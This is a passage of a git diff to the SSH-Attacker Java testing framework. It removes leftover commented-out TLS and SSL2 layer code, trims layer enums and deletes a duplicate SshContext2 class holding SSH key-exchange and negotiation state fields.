context.getTcpContext(); - // HttpContext httpContext = context.getHttpContext(); switch (type) { - /*case OPEN_VPN: - case QUIC: - case STARTTLS: - throw new UnsupportedOperationException("Not implemented yet"); - case DTLS: - return new LayerStack( - context, - new MessageLayer(tlsContext), - new DtlsFragmentLayer(tlsContext), - new RecordLayer(tlsContext), - new UdpLayer(tlsContext)); - case TLS: - layerStack = - new LayerStack( - context, - new MessageLayer(tlsContext), - new RecordLayer(tlsContext), - new TcpLayer(tcpContext)); - context.setLayerStack(layerStack); - return layerStack; - case HTTPS: - layerStack = - new LayerStack( - context, - new HttpLayer(httpContext), - new MessageLayer(tlsContext), - new RecordLayer(tlsContext), - new TcpLayer(tcpContext)); - return layerStack; - case SSL2: - layerStack = - new LayerStack( - context, new SSL2Layer(tlsContext), new TcpLayer(tcpContext)); - return layerStack;*/ case SSHv1: layerStack = new LayerStack( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java index 7df24ce40..3ec31ac82 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java @@ -10,10 +10,7 @@ /** Holds all implemented layers of the TLS-Core, not limited to any layer of the ISO stack */ public enum ImplementedLayers implements LayerType { TCP, - AuthenticationLayer, - ConnectionLayer, TransportLayer, - Session, SSHv1, SSHv2; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java index f38293719..c1e9e2564 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java @@ -15,12 +15,4 @@ public enum LayerConfiguration { SSHv1, SSHv2; - /* TLS, - DTLS, - QUIC, - OPEN_VPN, - - STARTTLS, - HTTPS, - SSL2; */ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index 7caac1aaa..b57a248ca 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -24,7 +24,6 @@ import de.rub.nds.sshattacker.core.packet.crypto.PacketEncryptor; import de.rub.nds.sshattacker.core.packet.layer.AbstractPacketLayer; import de.rub.nds.sshattacker.core.packet.layer.PacketLayerFactory; -import de.rub.nds.sshattacker.core.protocol.common.layer.MessageLayer; import de.rub.nds.sshattacker.core.protocol.connection.Channel; import de.rub.nds.sshattacker.core.protocol.connection.ChannelManager; import de.rub.nds.sshattacker.core.state.Context; @@ -253,7 +252,7 @@ public PacketCipher getActiveDecryptCipher() { private KeySet keySet; // endregion - public MessageLayer getMessageLayer() { + /* public MessageLayer getMessageLayer() { return messageLayer; } @@ -261,7 +260,7 @@ public void setMessageLayer(MessageLayer messageLayer) { this.messageLayer = messageLayer; } - private MessageLayer messageLayer = new MessageLayer(this.getContext()); + private MessageLayer messageLayer = new MessageLayer(this.getContext());*/ // region Connection Protocol diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 0e8846545..d2edda3ff 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -119,7 +119,7 @@ private void processMessage( collectedMessageStream.writeBytes(message.getCompleteResultingMessage().getValue()); - if (message.getCompleteResultingMessage().getValue()[0] + /* if (message.getCompleteResultingMessage().getValue()[0] == ProtocolMessageType.SSH_MSG_NEWKEYS.getValue() || message.getCompleteResultingMessage().getValue()[0] == ProtocolMessageType.SSH_MSG_KEXINIT.getValue()) { @@ -128,7 +128,7 @@ private void processMessage( LOGGER.info( "[bro] Adjusting Context while messagetype is {}", message.getCompleteResultingMessage().getValue()[0]); - } + }*/ } @Override @@ -226,19 +226,15 @@ public void readMessageForHint(PacketLayerHint hint) { case SSH_MSG_CHANNEL_CLOSE: readChannelCloseMessage(); break; - case SSH_MSG_CHANNEL_EOF: readChannelEofMessage(); break; - case SSH_MSG_CHANNEL_EXTENDED_DATA: readChannelExtendedDataMessage(); break; - case SSH_MSG_CHANNEL_FAILURE: readChannelFailureMessage(); break; - case SSH_MSG_CHANNEL_OPEN_FAILURE: readChannelOpenFailureMessage(); break; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java index 8d3ba4da6..d8040d7da 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java @@ -96,15 +96,6 @@ public HintedInputStream getDataStream() throws IOException { LOGGER.debug( "[bro] TCP-Layer is transmitting Datastream now with Timeout ", getTransportHandler().getTimeout()); - // TODO: remove later, just for debugging - /* - try { - TimeUnit.SECONDS.sleep(1); - } catch (InterruptedException e) { - throw new RuntimeException(e); - } - */ - InputStream handlerStream = getTransportHandler().getInputStream(); try { while (handlerStream.available() == 0 && retries < maxRetries) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index 60da4ebcf..b402eba91 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -7,18 +7,6 @@ */ package de.rub.nds.sshattacker.core.layer.impl; -/*import de.rub.nds.sshattacker.core.constants.SSL2MessageType; -import de.rub.nds.sshattacker.core.constants.SSL2TotalHeaderLengths; -import de.rub.nds.sshattacker.core.constants.ssl.SSL2ByteLength; -import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; -import de.rub.nds.sshattacker.core.exceptions.TimeoutException; -import de.rub.nds.sshattacker.core.layer.LayerConfiguration; -import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; -import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.message.*;*/ - import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.constants.PacketLayerType; @@ -63,26 +51,6 @@ public TransportLayer(SshContext context) { @Override public LayerProcessingResult sendConfiguration() throws IOException { - /*LayerConfiguration configuration = getLayerConfiguration(); - if (configuration != null && !configuration.getContainerList().isEmpty()) { - for (ProtocolMessage ssl2message : configuration.getContainerList()) { - ProtocolMessagePreparator preparator = ssl2message.getPreparator(context); - preparator.prepare(); - preparator.afterPrepare(); - ssl2message.getHandler(context).adjustContext(ssl2message); - ProtocolMessageSerializer serializer = ssl2message.getSerializer(context); - byte[] serializedMessage = serializer.serialize(); - ssl2message.setCompleteResultingMessage(serializedMessage); - ssl2message.getHandler(context).adjustContextAfterSerialize(ssl2message); - ssl2message.getHandler(context).updateDigest(ssl2message, true); - getLowerLayer() - .sendData( - new RecordLayerHint(ssl2message.getProtocolMessageType()), - serializedMessage); - addProducedContainer(ssl2message); - } - } - return getLayerResult();*/ LayerConfiguration configuration = getLayerConfiguration(); if (configuration != null && configuration.getContainerList() != null) { @@ -103,55 +71,11 @@ public LayerProcessingResult sendConfiguration() throws IOException { LayerProcessingResult layerProcessingResult = getLowerLayer().sendData(null, serializedMessage); - /*sendPacket(context, packet); - Handler handler = message.getHandler(context); - if (handler instanceof MessageSentHandler) { - ((MessageSentHandler) handler).adjustContextAfterMessageSent(); - } - return new MessageActionResult( - Collections.singletonList(packet), Collections.singletonList(message));*/ } catch (IOException e) { LOGGER.warn("Error while sending packet: " + e.getMessage()); - // return new MessageActionResult(); + // return new LayerProcessingResult(); } } - - /*public MessageActionResult sendMessages( - SshContext context, Stream> messageStream) { - return messageStream - .map(message -> sendMessage(context, message)) - .reduce(MessageActionResult::merge) - .orElse(new MessageActionResult()); - }*/ - - /* ProtocolMessageType contentType = packet.getContentMessageType(); - if (contentType == null) { - contentType = ProtocolMessageType.UNKNOWN; - LOGGER.warn( - "Sending record without a LayerProcessing hint. Using \"UNKNOWN\" as the type"); - } - */ - /*if (encryptor.getRecordCipher(writeEpoch).getState().getVersion().isDTLS() - && session.getEpoch() == null) { - session.setEpoch(writeEpoch); - }*/ - /* - if (packet.getCleanProtocolMessageBytes() == null) { - packet.setCleanProtocolMessageBytes(new byte[0]); - } - SessionPreparator preparator = - packet.getSessionPreparator( - context, */ - /* encryptor, compressor, */ - /* contentType); - preparator.prepare(); - preparator.afterPrepare(); - SessionSerializer serializer = packet.getSessionSerializer(); - byte[] serializedMessage = serializer.serialize(); - packet.setCompleteRecordBytes(serializedMessage); - getLowerLayer().sendData(null, serializedMessage); - addProducedContainer(packet); - }*/ } return getLayerResult(); } @@ -195,56 +119,6 @@ public LayerProcessingResult sendData( List packets = new LinkedList<>(); packets.add(packet); - /* - - List packets = new LinkedList<>(); - List givenPackets = getLayerConfiguration().getContainerList(); - - int dataToBeSent = additionalData.length; - - while (givenPackets.size() > 0 && dataToBeSent > 0) { - AbstractPacket nextPacket = givenPackets.remove(0); - packets.add(nextPacket); - */ - /* int recordData = - (nextPacket.get() != null - ? nextPacket.getMaxRecordLengthConfig() - : context.getChooser().getOutboundMaxRecordDataSize()); - dataToBeSent -= recordData;*/ - /* - } - - ByteArrayOutputStream stream = new ByteArrayOutputStream(); - - - - // prepare, serialize, and send records - for (AbstractPacket packet : packets) { - */ - /* ProtocolMessageType contentType = packet.getContentMessageType(); - if (contentType == null) { - contentType = type; - }*/ - /* - */ - /* if (encryptor.getRecordCipher(writeEpoch).getState().getVersion().isDTLS()) { - record.setEpoch(writeEpoch); - }*/ - /* - Preparator preparator = packet.getPreparator(context); - preparator.prepare(); - preparator.afterPrepare(); - try { - byte[] recordBytes = packet.getSerializer(context).serialize(); - packet.setCompletePacketBytes(recordBytes); - stream.write(packet.getCompletePacketBytes().getValue()); - } catch (IOException ex) { - throw new PreparationException( - "Could not write Record bytes to ByteArrayStream", ex); - } - addProducedContainer(packet); - }*/ - getLowerLayer().sendData(null, serializedMessage); return new LayerProcessingResult<>(packets, getLayerType(), true); } @@ -252,75 +126,9 @@ public LayerProcessingResult sendData( @Override public LayerProcessingResult receiveData() { - /*try { - int messageLength = 0; - byte paddingLength = 0; - byte[] totalHeader; - HintedInputStream dataStream = null; - SSL2MessageType messageType; - try { - - dataStream = getLowerLayer().getDataStream(); - totalHeader = dataStream.readNBytes(SSL2ByteLength.LENGTH); - - if (SSL2TotalHeaderLengths.isNoPaddingHeader(totalHeader[0])) { - messageLength = resolveUnpaddedMessageLength(totalHeader); - paddingLength = 0x00; - } else { - messageLength = resolvePaddedMessageLength(totalHeader); - paddingLength = dataStream.readByte(); - } - messageType = SSL2MessageType.getMessageType(dataStream.readByte()); - } catch (IOException e) { - LOGGER.warn( - "Failed to parse SSL2 message header, parsing as unknown SSL2 message", e); - messageType = SSL2MessageType.SSL_UNKNOWN; - } - - SSL2Message message = null; - - switch (messageType) { - case SSL_CLIENT_HELLO: - message = new SSL2ClientHelloMessage(); - break; - case SSL_CLIENT_MASTER_KEY: - message = new SSL2ClientMasterKeyMessage(); - break; - case SSL_SERVER_VERIFY: - message = new SSL2ServerVerifyMessage(); - break; - case SSL_SERVER_HELLO: - message = new SSL2ServerHelloMessage(); - break; - default: - message = new UnknownSSL2Message(); - } - - message.setType((byte) messageType.getType()); - message.setMessageLength(messageLength); - message.setPaddingLength((int) paddingLength); - readDataContainer(message, context); - - } catch (TimeoutException ex) { - LOGGER.debug(ex); - } catch (EndOfStreamException ex) { - LOGGER.debug("Reached end of stream, cannot parse more messages", ex); - } - - return getLayerResult();*/ throw new UnsupportedOperationException("Not supported yet."); } - /*private static int resolvePaddedMessageLength(final byte[] totalHeaderLength) { - return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_TWO_BIT.getValue()) << 8 - | totalHeaderLength[1]; - } - - private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) { - return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_ONE_BIT.getValue()) << 8 - | totalHeaderLength[1]; - }*/ - @Override public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { LOGGER.debug("[bro] receiveMoreDataForHint now in Transport"); @@ -472,7 +280,6 @@ public PacketLayerHint parseMessageId(AbstractPacket packet, SshContext context) case SSH_MSG_NEWCOMPRESS: LOGGER.debug("[bro] returning SSH_MSG_NEWCOMPRESS Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_NEWCOMPRESS); - case SSH_MSG_KEXINIT: LOGGER.debug("[bro] returning SSH KEX INIT Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXINIT); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/SshContext2.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/SshContext2.java deleted file mode 100644 index fb85168eb..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/SshContext2.java +++ /dev/null @@ -1,963 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.state; - -import de.rub.nds.sshattacker.core.config.Config; -import de.rub.nds.sshattacker.core.connection.AliasedConnection; -import de.rub.nds.sshattacker.core.constants.*; -import de.rub.nds.sshattacker.core.crypto.hash.ExchangeHashInputHolder; -import de.rub.nds.sshattacker.core.crypto.kex.AbstractEcdhKeyExchange; -import de.rub.nds.sshattacker.core.crypto.kex.DhKeyExchange; -import de.rub.nds.sshattacker.core.crypto.kex.HybridKeyExchange; -import de.rub.nds.sshattacker.core.crypto.kex.RsaKeyExchange; -import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; -import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; -import de.rub.nds.sshattacker.core.packet.layer.AbstractPacketLayer; -import de.rub.nds.sshattacker.core.protocol.connection.ChannelManager; -import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; -import de.rub.nds.tlsattacker.transport.TransportHandler; -import java.util.List; - -public class SshContext2 { - - /** Static configuration for SSH-Attacker */ - private Config config; - - private Chooser chooser; - - /** Connection used to communicate with the remote peer */ - private AliasedConnection connection; - - private TransportHandler transportHandler; - /** If set to true, an exception was received from the transport handler */ - private boolean receivedTransportHandlerException = false; - - /** The currently active packet layer type */ - private PacketLayerType packetLayerType; - /** A layer to serialize packets */ - private AbstractPacketLayer packetLayer; - /** - * If set to true, receive actions will read the incoming byte stream on a per line basis (each - * line is terminated by LF). - */ - private Boolean receiveAsciiModeEnabled; - /** A layer to serialize messages */ - // private MessageLayer messageLayer = new MessageLayer(this); - - /** - * Sequence number used to generate MAC when sending packages. The sequence number is unsigned, - * initialized to 0 and wraps around at 2^32. - */ - private Integer writeSequenceNumber; - /** - * Sequence number used to verify the MAC of received packages. The sequence number is unsigned, - * initialized to 0 and wraps around at 2^32. - */ - private Integer readSequenceNumber; - - /** - * If set to false, messages are handled as a server connection. handleAsClient is used to allow - * handling messages as a different connection end type than the connection end type of the - * fixed connection in the context. This is needed in the handling of mitm/proxy messages. - */ - private boolean handleAsClient; - - // region Version Exchange - /** Client protocol and software version string starting with the SSH version (SSH-2.0-...) */ - private String clientVersion; - /** Client comment sent alongside protocol and software version */ - private String clientComment; - /** End-of-message sequence of the clients' VersionExchangeMessage */ - private String clientEndOfMessageSequence; - /** Server protocol and software version string starting with the SSH version (SSH-2.0-...) */ - private String serverVersion; - /** Server comment sent alongside protocol and software version */ - private String serverComment; - /** End-of-message sequence of the servers' VersionExchangeMessage */ - private String serverEndOfMessageSequence; - - // endregion - - // region Key Exchange Initialization - /** Client cookie containing 16 random bytes */ - private byte[] clientCookie; - /** Server cookie containing 16 random bytes */ - private byte[] serverCookie; - /** List of key exchange algorithms supported by the remote peer */ - private List clientSupportedKeyExchangeAlgorithms; - /** List of key exchange algorithms supported by the server */ - private List serverSupportedKeyExchangeAlgorithms; - /** List of host key algorithms supported by the client */ - private List clientSupportedHostKeyAlgorithms; - /** List of host key algorithms supported by the server */ - private List serverSupportedHostKeyAlgorithms; - /** List of encryption algorithms (client to server) supported by the client */ - private List clientSupportedEncryptionAlgorithmsClientToServer; - /** List of encryption algorithms (server to client) supported by the client */ - private List clientSupportedEncryptionAlgorithmsServerToClient; - /** List of encryption algorithms (client to server) supported by the server */ - private List serverSupportedEncryptionAlgorithmsClientToServer; - /** List of encryption algorithms (server to client) supported by the server */ - private List serverSupportedEncryptionAlgorithmsServerToClient; - /** List of MAC algorithms (client to server) supported by the client */ - private List clientSupportedMacAlgorithmsClientToServer; - /** List of MAC algorithms (server to client) supported by the client */ - private List clientSupportedMacAlgorithmsServerToClient; - /** List of MAC algorithms (client to server) supported by the server */ - private List serverSupportedMacAlgorithmsClientToServer; - /** List of MAC algorithms (server to client) supported by the server */ - private List serverSupportedMacAlgorithmsServerToClient; - /** List of compression algorithms (client to server) supported by the client */ - private List clientSupportedCompressionMethodsClientToServer; - /** List of compression algorithms (server to client) supported by the client */ - private List clientSupportedCompressionMethodsServerToClient; - /** List of compression algorithms (client to server) supported by the server */ - private List serverSupportedCompressionMethodsClientToServer; - /** List of compression algorithms (server to client) supported by the server */ - private List serverSupportedCompressionMethodsServerToClient; - /** List of languages (client to server) supported by the client */ - private List clientSupportedLanguagesClientToServer; - /** List of languages (server to client) supported by the client */ - private List clientSupportedLanguagesServerToClient; - /** List of languages (client to server) supported by the server */ - private List serverSupportedLanguagesClientToServer; - /** List of languages (server to client) supported by the server */ - private List serverSupportedLanguagesServerToClient; - /** - * A boolean flag used to indicate that a guessed key exchange paket will be sent by the client - */ - private Boolean clientFirstKeyExchangePacketFollows; - /** - * A boolean flag used to indicate that a guessed key exchange paket will be sent by the server - */ - private Boolean serverFirstKeyExchangePacketFollows; - /** Value of the clients' reserved field which may be used for extensions in the future */ - private Integer clientReserved; - /** Value of the servers' reserved field which may be used for extensions in the future */ - private Integer serverReserved; - // endregion - - // region Negotiated Parameters - /** Negotiated key exchange algorithm */ - private KeyExchangeAlgorithm keyExchangeAlgorithm; - /** Negotiated host key algorithm */ - private PublicKeyAlgorithm hostKeyAlgorithm; - /** Negotiated encryption algorithm (client to server) */ - private EncryptionAlgorithm encryptionAlgorithmClientToServer; - /** Negotiated encryption algorithm (server to client) */ - private EncryptionAlgorithm encryptionAlgorithmServerToClient; - /** Negotiated MAC algorithm (client to server) */ - private MacAlgorithm macAlgorithmClientToServer; - /** Negotiated MAC algorithm (server to client) */ - private MacAlgorithm macAlgorithmServerToClient; - /** Negotiated compression algorithm (client to server) */ - private CompressionMethod compressionMethodClientToServer; - /** Negotiated compression algorithm (server to client) */ - private CompressionMethod compressionMethodServerToClient; - // endregion - - // region Key Exchange - /** Key exchange instance for static DH key exchange method(s) */ - private DhKeyExchange dhKeyExchangeInstance; - /** Key exchange instance for DH key exchange method(s) with group exchange */ - private DhKeyExchange dhGexKeyExchangeInstance; - /** Key exchange instance for ECDH key exchange method(s) (incl. X curve ECDH) */ - private AbstractEcdhKeyExchange ecdhKeyExchangeInstance; - /** Key exchange instance for RSA key exchange method(s) */ - private RsaKeyExchange rsaKeyExchangeInstance; - /** Key exchange instance for Hybrid key exchange method(s) */ - private HybridKeyExchange hybridKeyExchangeInstance; - /** - * If set to true, the most recent group request received was of type - * DhGexKeyExchangeOldRequestMessage - */ - private boolean oldGroupRequestReceived = false; - /** Minimal acceptable DH group size as reported in the SSH_MSG_KEX_DH_GEX_REQUEST message */ - private Integer minimalDhGroupSize; - /** Preferred DH group size as reported in the SSH_MSG_KEX_DH_GEX_REQUEST message */ - private Integer preferredDhGroupSize; - /** Maximal acceptable DH group size as reported in the SSH_MSG_KEX_DH_GEX_REQUEST message */ - private Integer maximalDhGroupSize; - /** Host key */ - private SshPublicKey hostKey; - /** Signature generated by the server over the exchange hash to authenticate the key exchange */ - private byte[] serverExchangeHashSignature; - /** Flag indicating whether the server exchange hash signature is valid */ - private Boolean serverExchangeHashSignatureValid; - // endregion - - // region Exchange Hash and Cryptographic Keys - /** Holder instance for the exchange hash input values */ - private ExchangeHashInputHolder exchangeHashInputHolder; - /** Exchange hash of the most recent key exchange */ - private byte[] exchangeHash; - /** - * Unique identifier for this session. This is equal to the first computed exchange hash and - * never changes - */ - private byte[] sessionID; - /** The shared secret established by the negotiated key exchange method */ - private byte[] sharedSecret; - /** The key set derived from the shared secret, the exchange hash, and the session ID */ - private KeySet keySet; - // endregion - - // region Connection Protocol - - private ChannelManager channelManager; - - // TODO: Implement channel requests in such a way that allows specification within the XML file - // endregion - - /** If set to true, a SSH_MSG_DISCONNECT has been received from the remote peer */ - private boolean disconnectMessageReceived = false; - /** If set to true, a version exchange message was sent by each side */ - private boolean versionExchangeCompleted = false; - - // DUMMY: - public SshContext2() {} -} - // DUMMY ENDE -/* - // region Constructors and Initalization - public SshContext() { - this(Config.createConfig()); - } - - public SshContext(Config config) { - RunningModeType mode = config.getDefaultRunningMode(); - if (mode == null) { - throw new ConfigurationException("Cannot create connection, running mode not set"); - } else { - switch (mode) { - case CLIENT: - init(config, config.getDefaultClientConnection()); - break; - case SERVER: - init(config, config.getDefaultServerConnection()); - break; - default: - throw new ConfigurationException( - "Cannot create connection for unknown running mode '" + mode + "'"); - } - } - } - - public SshContext(Config config, AliasedConnection connection) { - init(config, connection); - } - - public void init(Config config, AliasedConnection connection) { - this.config = config; - this.connection = connection; - exchangeHashInputHolder = new ExchangeHashInputHolder(); - - // TODO: Initial packet layer type from config - packetLayerType = PacketLayerType.BLOB; - packetLayer = PacketLayerFactory.getPacketLayer(packetLayerType, this); - receiveAsciiModeEnabled = true; - writeSequenceNumber = 0; - readSequenceNumber = 0; - handleAsClient = (connection.getLocalConnectionEndType() == ConnectionEndType.CLIENT); - channelManager = new ChannelManager(this); - } - - // endregion - - public Config getConfig() { - return config; - } - - public Chooser getChooser() { - if (chooser == null) { - chooser = ChooserFactory.getChooser(config.getChooserType(), this, config); - } - return chooser; - } - - public AliasedConnection getConnection() { - return connection; - } - - public void setConnection(AliasedConnection connection) { - this.connection = connection; - } - - public TransportHandler getTransportHandler() { - return transportHandler; - } - - public void setTransportHandler(TransportHandler transportHandler) { - this.transportHandler = transportHandler; - } - - public boolean hasReceivedTransportHandlerException() { - return receivedTransportHandlerException; - } - - public void setReceivedTransportHandlerException(boolean receivedTransportHandlerException) { - this.receivedTransportHandlerException = receivedTransportHandlerException; - } - - public void initTransportHandler() { - if (transportHandler == null) { - if (connection == null) { - throw new ConfigurationException("Connection end not set"); - } - transportHandler = TransportHandlerFactory.createTransportHandler(connection); - } - - try { - transportHandler.preInitialize(); - transportHandler.initialize(); - } catch (NullPointerException | NumberFormatException ex) { - throw new ConfigurationException("Invalid values in " + connection.toString(), ex); - } catch (IOException ex) { - throw new TransportHandlerConnectException( - "Unable to initialize the transport handler with: " + connection.toString(), - ex); - } - } - - public PacketLayerType getPacketLayerType() { - return packetLayerType; - } - - public void setPacketLayerType(PacketLayerType packetLayerType) { - this.packetLayerType = packetLayerType; - } - - public AbstractPacketLayer getPacketLayer() { - return packetLayer; - } - - public void setPacketLayer(AbstractPacketLayer packetLayer) { - this.packetLayer = packetLayer; - } - - public Boolean isReceiveAsciiModeEnabled() { - return receiveAsciiModeEnabled; - } - - public void setReceiveAsciiModeEnabled(boolean receiveAsciiModeEnabled) { - this.receiveAsciiModeEnabled = receiveAsciiModeEnabled; - } - - public MessageLayer getMessageLayer() { - return messageLayer; - } - - public void setMessageLayer(MessageLayer messageLayer) { - this.messageLayer = messageLayer; - } - - // region Getters and Setters for Sequence Numbers - public int getWriteSequenceNumber() { - return writeSequenceNumber; - } - - public void setWriteSequenceNumber(int writeSequenceNumber) { - this.writeSequenceNumber = writeSequenceNumber; - } - - public void incrementWriteSequenceNumber() { - incrementWriteSequenceNumber(1); - } - - public void incrementWriteSequenceNumber(int i) { - // Java does not support native unsigned integers :( - writeSequenceNumber = - (int) - ((Integer.toUnsignedLong(writeSequenceNumber) + Integer.toUnsignedLong(i)) - % DataFormatConstants.UNSIGNED_INT_MAX_VALUE); - } - - public int getReadSequenceNumber() { - return readSequenceNumber; - } - - public void setReadSequenceNumber(int readSequenceNumber) { - this.readSequenceNumber = readSequenceNumber; - } - - public void incrementReadSequenceNumber() { - incrementReadSequenceNumber(1); - } - - public void incrementReadSequenceNumber(int i) { - // Java does not support native unsigned integers :( - readSequenceNumber = - (int) - ((Integer.toUnsignedLong(readSequenceNumber) + Integer.toUnsignedLong(i)) - % DataFormatConstants.UNSIGNED_INT_MAX_VALUE); - } - - // endregion - - // region Getters for Version Exchange Fields - public Optional getClientVersion() { - return Optional.ofNullable(clientVersion); - } - - public Optional getClientComment() { - return Optional.ofNullable(clientComment); - } - - public Optional getClientEndOfMessageSequence() { - return Optional.ofNullable(clientEndOfMessageSequence); - } - - public Optional getServerVersion() { - return Optional.ofNullable(serverVersion); - } - - public Optional getServerComment() { - return Optional.ofNullable(serverComment); - } - - public Optional getServerEndOfMessageSequence() { - return Optional.ofNullable(serverEndOfMessageSequence); - } - - // endregion - // region Setters for Version Exchange Fields - public void setClientVersion(String clientVersion) { - this.clientVersion = clientVersion; - } - - public void setClientComment(String clientComment) { - this.clientComment = clientComment; - } - - public void setClientEndOfMessageSequence(String clientEndOfMessageSequence) { - this.clientEndOfMessageSequence = clientEndOfMessageSequence; - } - - public void setServerVersion(String serverVersion) { - this.serverVersion = serverVersion; - } - - public void setServerComment(String serverComment) { - this.serverComment = serverComment; - } - - public void setServerEndOfMessageSequence(String serverEndOfMessageSequence) { - this.serverEndOfMessageSequence = serverEndOfMessageSequence; - } - // endregion - - // region Getters for Key Exchange Initialization Fields - public Optional getClientCookie() { - return Optional.ofNullable(clientCookie); - } - - public Optional getServerCookie() { - return Optional.ofNullable(serverCookie); - } - - public Optional> getClientSupportedKeyExchangeAlgorithms() { - return Optional.ofNullable(clientSupportedKeyExchangeAlgorithms); - } - - public Optional> getServerSupportedKeyExchangeAlgorithms() { - return Optional.ofNullable(serverSupportedKeyExchangeAlgorithms); - } - - public Optional> getClientSupportedHostKeyAlgorithms() { - return Optional.ofNullable(clientSupportedHostKeyAlgorithms); - } - - public Optional> getServerSupportedHostKeyAlgorithms() { - return Optional.ofNullable(serverSupportedHostKeyAlgorithms); - } - - public Optional> - getClientSupportedEncryptionAlgorithmsClientToServer() { - return Optional.ofNullable(clientSupportedEncryptionAlgorithmsClientToServer); - } - - public Optional> - getClientSupportedEncryptionAlgorithmsServerToClient() { - return Optional.ofNullable(clientSupportedEncryptionAlgorithmsServerToClient); - } - - public Optional> - getServerSupportedEncryptionAlgorithmsServerToClient() { - return Optional.ofNullable(serverSupportedEncryptionAlgorithmsServerToClient); - } - - public Optional> - getServerSupportedEncryptionAlgorithmsClientToServer() { - return Optional.ofNullable(serverSupportedEncryptionAlgorithmsClientToServer); - } - - public Optional> getClientSupportedMacAlgorithmsClientToServer() { - return Optional.ofNullable(clientSupportedMacAlgorithmsClientToServer); - } - - public Optional> getClientSupportedMacAlgorithmsServerToClient() { - return Optional.ofNullable(clientSupportedMacAlgorithmsServerToClient); - } - - public Optional> getServerSupportedMacAlgorithmsServerToClient() { - return Optional.ofNullable(serverSupportedMacAlgorithmsServerToClient); - } - - public Optional> getServerSupportedMacAlgorithmsClientToServer() { - return Optional.ofNullable(serverSupportedMacAlgorithmsClientToServer); - } - - public Optional> getClientSupportedCompressionMethodsClientToServer() { - return Optional.ofNullable(clientSupportedCompressionMethodsClientToServer); - } - - public Optional> getClientSupportedCompressionMethodsServerToClient() { - return Optional.ofNullable(clientSupportedCompressionMethodsServerToClient); - } - - public Optional> getServerSupportedCompressionMethodsServerToClient() { - return Optional.ofNullable(serverSupportedCompressionMethodsServerToClient); - } - - public Optional> getServerSupportedCompressionMethodsClientToServer() { - return Optional.ofNullable(serverSupportedCompressionMethodsClientToServer); - } - - public Optional> getClientSupportedLanguagesClientToServer() { - return Optional.ofNullable(clientSupportedLanguagesClientToServer); - } - - public Optional> getClientSupportedLanguagesServerToClient() { - return Optional.ofNullable(clientSupportedLanguagesServerToClient); - } - - public Optional> getServerSupportedLanguagesServerToClient() { - return Optional.ofNullable(serverSupportedLanguagesServerToClient); - } - - public Optional> getServerSupportedLanguagesClientToServer() { - return Optional.ofNullable(serverSupportedLanguagesClientToServer); - } - - public Optional getClientFirstKeyExchangePacketFollows() { - return Optional.ofNullable(clientFirstKeyExchangePacketFollows); - } - - public Optional getServerFirstKeyExchangePacketFollows() { - return Optional.ofNullable(serverFirstKeyExchangePacketFollows); - } - - public Optional getClientReserved() { - return Optional.ofNullable(clientReserved); - } - - public Optional getServerReserved() { - return 